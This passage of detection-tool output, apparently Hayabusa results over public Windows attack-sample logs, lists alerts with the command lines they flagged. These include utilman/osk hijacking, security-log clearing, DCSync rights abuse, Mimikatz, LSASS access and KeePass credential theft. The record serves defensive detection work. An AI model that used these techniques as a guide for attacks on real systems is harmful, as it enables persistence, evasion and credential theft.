: User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 
08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe 
/debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx +2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx 
+2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: 
C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : Parent 
Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: 
technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus 